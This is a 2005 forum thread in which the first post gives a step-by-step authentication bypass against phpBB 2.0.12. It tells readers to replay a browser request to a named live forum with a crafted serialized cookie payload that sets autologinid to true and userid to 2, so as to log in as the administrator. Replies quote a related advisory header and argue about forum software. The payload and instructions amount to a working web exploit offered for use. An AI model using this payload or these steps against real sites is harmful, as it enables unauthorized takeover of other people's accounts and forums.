Author Topic: phpBB Bug (Again...)  (Read 4753 times)

0 Members and 1 Guest are viewing this topic.

Offline Networks

  • Full Member
  • ***
  • Posts: 415
  • I haven't visited my profile!
    • View Profile
phpBB Bug (Again...)
« on: March 25, 2005, 06:30:54 pm »
Quote
Ok, now let's get to it. Here is what you will need:
-Preferably a mozilla client, such as Firefox
-LiveHTTP Headers plugin for FireFox Here

Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am suprised it wasn't found earlier.

Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot

In the packet will be thefollowing data
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D


On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

and then click "reload".

after the page has reloaded you should be logged in a user number 2 , which is usually the administrators id number.

I myself have tried it several times, I have not succeeded in getting an admin status so blah.

Edit: PHPBB 2.0.12 Exploit (That may be why)
« Last Edit: March 25, 2005, 06:32:49 pm by Networks »

http://www.zeroforce.net

Quote
[16:50:11] Networks:0:32: What will soup bot be like?
[16:50:15] Warrior[x86]:16:-1: soup-like.
[16:50:21] warzofbeta@Lordaeron:0:62: Like god.
[16:50:26] Warrior[x86]:16:-1: Fake?

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: phpBB Bug (Again...)
« Reply #1 on: March 25, 2005, 06:33:08 pm »
Eww @ not giving credit :P

------------------------------------------------------------------------
# phpBB 2.0.13 failure to reset user level after failed exploit
# discovered By : tOnk3r
# e-mail : m[at]spywire[dot]net
# date : 22-march-05
# shouts: pureone, spywire.net crew , and everybody i know!
# Versions affected : ALL versions upto and including 2.0.13
# status : vendor notified (phpbb)
------------------------------------------------------------------------

Hoepfully they fix that fast :-o

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: phpBB Bug (Again...)
« Reply #2 on: March 25, 2005, 06:39:55 pm »
It's quite rediculous: I've seen so many phpBB exploits on BugTraq mailing list, it's a wonder anyone uses that software.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline Newby

  • x86
  • Hero Member
  • *****
  • Posts: 10877
  • Thrash!
    • View Profile
Re: phpBB Bug (Again...)
« Reply #3 on: March 25, 2005, 06:43:37 pm »
SMF for life!
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Offline Networks

  • Full Member
  • ***
  • Posts: 415
  • I haven't visited my profile!
    • View Profile
Re: phpBB Bug (Again...)
« Reply #4 on: March 26, 2005, 01:46:41 am »
SMF for life!

Wrong, Invision for life!

http://www.zeroforce.net

Quote
[16:50:11] Networks:0:32: What will soup bot be like?
[16:50:15] Warrior[x86]:16:-1: soup-like.
[16:50:21] warzofbeta@Lordaeron:0:62: Like god.
[16:50:26] Warrior[x86]:16:-1: Fake?